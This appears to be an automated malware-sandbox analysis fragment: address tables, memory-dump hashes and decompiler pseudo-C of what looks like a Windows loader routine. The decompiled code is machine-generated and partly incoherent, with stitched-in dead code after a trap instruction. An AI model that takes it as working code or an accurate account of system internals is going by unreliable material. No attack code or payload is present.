                            0x01355983
                            0x01355988
                            0x0135598d
                            0x01355991
                            0x01355991
                            0x00000000
                            0x0135595d
                            0x0135595d
                            0x01355963
                            0x01355965
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355967
                            0x01355967
                            0x0135596b
                            0x0135596d
                            0x00000000
                            0x00000000
                            0x0135596f
                            0x01355971
                            0x01355971
                            0x01355974
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01355974
                            0x00000000
                            0x01355967
                            0x0135595b
                            0x01355942
                            0x01355863
                            0x01312143
                            0x01312143
                            0x01312149
                            0x0131214f
                            0x013122f1
                            0x013122f6
                            0x00000000
                            0x01312173
                            0x01312173
                            0x0131217d
                            0x01312181
                            0x01312186
                            0x013559ae
                            0x013559b2
                            0x013559b5
                            0x013559b7
                            0x013559ba
                            0x013559cd
                            0x013559d1
                            0x013559d5
                            0x013559d9
                            0x013559db
                            0x00000000
                            0x00000000
                            0x013559dd
                            0x013559dd
                            0x013559e1
                            0x013559e4
                            0x013559e7
                            0x013559ee
                            0x013559ee
                            0x013559f3
                            0x013559f3
                            0x00000000
                            0x01312186
                            0x0131214f
                            0x01312106
                            0x01312266
                            0x013120d8
                            0x013120da
                            0x013120e0
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a815768604803bd8927b60c73fb5372c9883e87f294892d89fb92aaac3e99c0
                            • Instruction ID: 84055178aa2104b482d473d93204c64ea98637245edc6bf5c5b72515c9ed9429
                            • Opcode Fuzzy Hash: 2a815768604803bd8927b60c73fb5372c9883e87f294892d89fb92aaac3e99c0
                            • Instruction Fuzzy Hash: 19F117356083419FE76ACF2CC440B6B7BE5AF8572CF24852DED999B285D734E841CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012FD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E012FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x13dd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E012F6600(0x13d52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x13d7b9c; // 0x0
							_t281 = L01304620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0132F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x13d7b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x13d7b8c; // 0xdb2a78
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01302280(_t200, 0x13d84d8);
									_t277 =  *0x13d85f4; // 0xdb2f68
									_t351 =  *0x13d85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xdb2f00
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E012FFFB0(_t287, _t353, 0x13d84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0133CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E012F6600(0x13d52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E012F7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x13db239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0136E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x13d8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x13db1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x13db218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01302280(_t250, 0x13d84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01323898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E012FFFB0(_t293, _t353, 0x13d84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E013237F5(_t353, 0);
																}
																E01320413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01319B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E013102D6(_t174);
																}
																L013077F0( *0x13d7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0131C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L012FEC7F(_t353);
										L013119B8(_t287, 0, _t353, 0);
										_t200 = E012EF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x13db2f8 |  *0x13db2fc) == 0 || ( *0x13db2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0132B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x13db2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01396B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01396AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E012FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L012FEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01329730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E012FE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L012F8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01323C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                            0x012fd5f2
                            0x012fd5f5
                            0x012fd5f5
                            0x012fd5fd
                            0x012fd600
                            0x012fd60a
                            0x012fd60d
                            0x012fd617
                            0x012fd61d
                            0x012fd627
                            0x012fd62e
                            0x012fd911
                            0x012fd913
                            0x00000000
                            0x012fd919
                            0x012fd919
                            0x012fd919
                            0x012fd634
                            0x012fd634
                            0x012fd634
                            0x012fd634
                            0x012fd640
                            0x012fd8bf
                            0x00000000
                            0x012fd646
                            0x012fd646
                            0x012fd64d
                            0x012fd652
                            0x0134b2fc
                            0x0134b2fc
                            0x0134b302
                            0x0134b33b
                            0x0134b341
                            0x00000000
                            0x0134b304
                            0x0134b304
                            0x0134b319
                            0x0134b31e
                            0x0134b324
                            0x0134b326
                            0x0134b332
                            0x0134b347
                            0x0134b34c
                            0x0134b351
                            0x0134b35a
                            0x00000000
                            0x0134b328
                            0x0134b328
                            0x00000000
                            0x0134b328
                            0x0134b326
                            0x012fd658
                            0x012fd658
                            0x012fd65b
                            0x012fd665
                            0x00000000
                            0x012fd66b
                            0x012fd66b
                            0x012fd66b
                            0x012fd66b
                            0x012fd66d
                            0x012fd672
                            0x012fd67a
                            0x00000000
                            0x00000000
                            0x012fd680
                            0x012fd686
                            0x012fd8ce
                            0x012fd8d4
                            0x012fd8dd
                            0x012fd8e0
                            0x012fd68c
                            0x012fd691
                            0x012fd69d
                            0x012fd6a2
                            0x012fd6a7
                            0x012fd6b0
                            0x012fd6b5
                            0x012fd6e0
                            0x012fd6b7
                            0x012fd6b7
                            0x012fd6b9
                            0x012fd6b9
                            0x012fd6bb
                            0x012fd6bd
                            0x012fd6ce
                            0x012fd6d0
                            0x012fd6d2
                            0x0134b363
                            0x0134b365
                            0x00000000
                            0x0134b36b
                            0x00000000
                            0x0134b36b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fd6bf
                            0x012fd6bf
                            0x012fd6e5
                            0x012fd6e7
                            0x012fd6e9
                            0x012fd6ec
                            0x012fd6ec
                            0x012fd6ef
                            0x012fd6f5
                            0x012fd6f9
                            0x012fd6fb
                            0x012fd6fd
                            0x012fd701
                            0x012fd703
                            0x012fd70a
                            0x012fd70a
                            0x012fd701
                            0x012fd710
                            0x012fd710
                            0x012fd6c1
                            0x012fd6c1
                            0x012fd6c6
                            0x0134b36d
                            0x0134b36f
                            0x00000000
                            0x0134b375
                            0x0134b375
                            0x0134b375
                            0x00000000
                            0x0134b375
                            0x00000000
                            0x012fd6cc
                            0x012fd6d8
                            0x012fd6d8
                            0x012fd6d8
                            0x00000000
                            0x012fd6c6
                            0x012fd6bf
                            0x00000000
                            0x012fd6da
                            0x012fd6da
                            0x012fd716
                            0x012fd71b
                            0x012fd720
                            0x012fd726
                            0x012fd726
                            0x012fd72d
                            0x00000000
                            0x012fd733
                            0x012fd739
                            0x012fd742
                            0x012fd750
                            0x012fd758
                            0x012fd764
                            0x012fd776
                            0x012fd77a
                            0x012fd783
                            0x012fd928
                            0x012fd92c
                            0x012fd93d
                            0x012fd944
                            0x012fd94f
                            0x012fd954
                            0x012fd956
                            0x012fd95f
                            0x012fd961
                            0x012fd973
                            0x012fd973
                            0x012fd956
                            0x012fd944
                            0x012fd92c
                            0x012fd78b
                            0x0134b394
                            0x012fd791
                            0x012fd798
                            0x0134b3a3
                            0x0134b3bb
                            0x0134b3bb
                            0x012fd7a5
                            0x012fd866
                            0x012fd870
                            0x012fd892
                            0x012fd898
                            0x012fd89e
                            0x012fd8a0
                            0x012fd8a6
                            0x012fd8ac
                            0x012fd8ae
                            0x012fd8b4
                            0x012fd8b4
                            0x012fd8ae
                            0x012fd7a5
                            0x012fd78b
                            0x012fd7b1
                            0x0134b3c5
                            0x0134b3c5
                            0x012fd7c3
                            0x012fd7ca
                            0x012fd7e5
                            0x012fd7eb
                            0x012fd8eb
                            0x012fd8ed
                            0x00000000
                            0x012fd8f3
                            0x012fd8f3
                            0x012fd8f3
                            0x00000000
                            0x012fd8ed
                            0x012fd7cc
                            0x012fd7cc
                            0x012fd7d2
                            0x00000000
                            0x012fd7d4
                            0x012fd7d4
                            0x012fd7d7
                            0x012fd7df
                            0x0134b3d4
                            0x0134b3d9
                            0x0134b3dc
                            0x0134b3dc
                            0x0134b3df
                            0x0134b3e2
                            0x0134b468
                            0x0134b46d
                            0x0134b46f
                            0x0134b46f
                            0x0134b475
                            0x012fd8f8
                            0x012fd8f9
                            0x012fd8fd
                            0x0134b3e8
                            0x0134b3e8
                            0x0134b3eb
                            0x0134b3ed
                            0x00000000
                            0x0134b3ef
                            0x0134b3ef
                            0x0134b3f1
                            0x0134b3f4
                            0x0134b3fe
                            0x0134b404
                            0x0134b409
                            0x0134b40e
                            0x0134b410
                            0x0134b410
                            0x0134b414
                            0x0134b414
                            0x0134b41b
                            0x0134b420
                            0x0134b423
                            0x0134b425
                            0x0134b427
                            0x0134b42a
                            0x0134b42d
                            0x0134b42d
                            0x0134b42a
                            0x0134b432
                            0x0134b436
                            0x0134b438
                            0x0134b43b
                            0x0134b43b
                            0x0134b449
                            0x0134b44e
                            0x0134b454
                            0x0134b458
                            0x0134b458
                            0x0134b45d
                            0x00000000
                            0x0134b45d
                            0x0134b3ed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fd7df
                            0x012fd7d2
                            0x012fd7ca
                            0x0134b37c
                            0x0134b37e
                            0x0134b385
                            0x0134b38a
                            0x00000000
                            0x0134b38a
                            0x012fd742
                            0x012fd7f1
                            0x012fd7f8
                            0x0134b49b
                            0x0134b49b
                            0x012fd800
                            0x012fd837
                            0x012fd843
                            0x012fd845
                            0x012fd847
                            0x012fd84a
                            0x012fd84b
                            0x012fd84e
                            0x012fd857
                            0x012fd818
                            0x012fd824
                            0x012fd831
                            0x0134b4a5
                            0x0134b4ab
                            0x0134b4b3
                            0x0134b4b8
                            0x0134b4bb
                            0x00000000
                            0x0134b4c1
                            0x0134b4c1
                            0x0134b4c8
                            0x00000000
                            0x0134b4ce
                            0x0134b4d4
                            0x0134b4e1
                            0x0134b4e3
                            0x0134b4e5
                            0x00000000
                            0x0134b4eb
                            0x0134b4f0
                            0x0134b4f2
                            0x012fdac9
                            0x012fdacc
                            0x012fdacf
                            0x012fdad1
                            0x012fdd78
                            0x012fdd78
                            0x012fdcf2
                            0x00000000
                            0x012fdad7
                            0x012fdad9
                            0x012fdadb
                            0x00000000
                            0x00000000
                            0x012fdae1
                            0x012fdae1
                            0x012fdae4
                            0x012fdae6
                            0x0134b4f9
                            0x0134b4f9
                            0x0134b500
                            0x012fdaec
                            0x012fdaec
                            0x012fdaf5
                            0x012fdaf8
                            0x012fdafb
                            0x012fdb03
                            0x012fdb11
                            0x012fdb16
                            0x012fdb19
                            0x012fdb1b
                            0x0134b52c
                            0x0134b531
                            0x0134b534
                            0x012fdb21
                            0x012fdb21
                            0x012fdb24
                            0x012fdcd9
                            0x012fdce2
                            0x012fdce5
                            0x012fdd6a
                            0x012fdd6d
                            0x00000000
                            0x012fdd73
                            0x0134b51a
                            0x0134b51c
                            0x0134b51f
                            0x0134b524
                            0x00000000
                            0x0134b524
                            0x012fdce7
                            0x012fdce7
                            0x012fdce7
                            0x00000000
                            0x012fdce7
                            0x00000000
                            0x012fdb2a
                            0x012fdb2c
                            0x012fdb31
                            0x012fdb33
                            0x012fdb36
                            0x012fdb39
                            0x012fdb3b
                            0x012fdb66
                            0x012fdb66
                            0x012fdb3d
                            0x012fdb3d
                            0x012fdb3e
                            0x012fdb46
                            0x012fdb47
                            0x012fdb49
                            0x012fdb4c
                            0x012fdb53
                            0x012fdb55
                            0x012fdb58
                            0x012fdb5a
                            0x0134b50a
                            0x0134b50f
                            0x0134b512
                            0x012fdb60
                            0x012fdb60
                            0x012fdb63
                            0x012fdb63
                            0x00000000
                            0x012fdb63
                            0x012fdb5a
                            0x012fdb3b
                            0x012fdb24
                            0x012fdb69
                            0x012fdb69
                            0x012fdb6c
                            0x012fdb6f
                            0x012fdb74
                            0x0134b557
                            0x0134b557
                            0x0134b55e
                            0x012fdb7a
                            0x012fdb7c
                            0x012fdb7f
                            0x012fdb82
                            0x012fdb85
                            0x00000000
                            0x012fdb8b
                            0x012fdb8b
                            0x012fdb8d
                            0x012fdb9b
                            0x012fdb9b
                            0x012fdb9d
                            0x012fdba0
                            0x012fdba2
                            0x012fdba4
                            0x012fdba7
                            0x012fdba9
                            0x012fdbae
                            0x012fdbae
                            0x012fdbb1
                            0x012fdbb4
                            0x012fdbb4
                            0x012fdbb7
                            0x012fdbba
                            0x012fdcd2
                            0x012fdcd4
                            0x00000000
                            0x012fdbc0
                            0x012fdbc0
                            0x012fdbd2
                            0x012fdbd7
                            0x012fdbda
                            0x012fdbdd
                            0x012fdbdf
                            0x00000000
                            0x012fdbe5
                            0x012fdbe5
                            0x012fdbee
                            0x012fdbf1
                            0x0134b541
                            0x0134b544
                            0x00000000
                            0x0134b546
                            0x0134b546
                            0x00000000
                            0x0134b546
                            0x012fdbf7
                            0x012fdbf7
                            0x012fdbfd
                            0x012fdbfd
                            0x012fdbff
                            0x012fdc0b
                            0x012fdc15
                            0x012fdc1b
                            0x012fdc1d
                            0x012fdc21
                            0x012fdc21
                            0x012fdc23
                            0x012fdc23
                            0x012fdc26
                            0x012fdc29
                            0x012fdc2b
                            0x00000000
                            0x00000000
                            0x012fdc31
                            0x012fdc34
                            0x012fdc36
                            0x012fdcbf
                            0x012fdcbf
                            0x012fdcc2
                            0x00000000
                            0x012fdc3c
                            0x012fdc41
                            0x012fdc43
                            0x00000000
                            0x012fdc45
                            0x012fdc45
                            0x012fdc47
                            0x00000000
                            0x012fdc4d
                            0x012fdc4d
                            0x012fdc50
                            0x012fdc52
                            0x012fdc55
                            0x012fdcfa
                            0x012fdcfe
                            0x012fdd08
                            0x012fdd0a
                            0x012fdd0c
                            0x00000000
                            0x012fdd12
                            0x012fdd15
                            0x012fdd2d
                            0x012fdd2f
                            0x012fdd32
                            0x012fdd35
                            0x00000000
                            0x012fdd35
                            0x012fdc5b
                            0x012fdc5b
                            0x012fdc5e
                            0x012fdc61
                            0x012fdc64
                            0x012fdc67
                            0x012fdc67
                            0x012fdc6a
                            0x012fdc6c
                            0x012fdc8e
                            0x012fdc8e
                            0x012fdc91
                            0x012fdc93
                            0x012fdcce
                            0x012fdcce
                            0x012fdc95
                            0x012fdc9c
                            0x012fdc6e
                            0x012fdc72
                            0x012fdc75
                            0x012fdc77
                            0x012fdc79
                            0x0134b551
                            0x0134b551
                            0x00000000
                            0x012fdc7f
                            0x012fdc7f
                            0x012fdc81
                            0x00000000
                            0x012fdc83
                            0x012fdc86
                            0x012fdc88
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fdc88
                            0x012fdc81
                            0x012fdc79
                            0x012fdc6c
                            0x012fdc55
                            0x012fdc47
                            0x012fdc43
                            0x00000000
                            0x012fdc36
                            0x012fdc23
                            0x00000000
                            0x012fdbff
                            0x012fdbf1
                            0x012fdbdf
                            0x012fdb8f
                            0x012fdb92
                            0x012fdb95
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x012fdb95
                            0x012fdb8d
                            0x012fdb85
                            0x012fdb74
                            0x012fdc9f
                            0x012fdca2
                            0x012fdcb0
                            0x012fdcb0
                            0x012fdad1
                            0x0134b4e5
                            0x0134b4c8
                            0x00000000
                            0x00000000
